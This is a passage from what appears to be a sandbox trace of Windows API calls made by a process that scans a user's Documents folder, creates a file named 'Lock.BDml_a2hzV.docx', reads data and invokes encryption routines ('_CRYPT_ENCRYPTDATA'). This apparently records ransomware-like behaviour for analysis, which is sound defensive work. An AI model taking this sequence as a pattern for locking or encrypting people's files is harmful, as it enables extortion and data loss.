hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0259.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0259.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0259.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.797] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0259.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0259.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0259.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0259.799] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.799] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.BDml_a2hzV.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.bdml_a2hzv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.800] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0259.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0259.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0259.806] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0259.806] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0xa512, lpOverlapped=0x0) returned 1 [0259.809] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0259.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0259.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f14010 [0259.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f1e530 [0259.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f14010 [0259.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.814] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0259.814] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f14010 [0259.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e38 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0259.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f28a50 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0259.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0259.816] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0259.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.817] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0259.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.819] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.819] 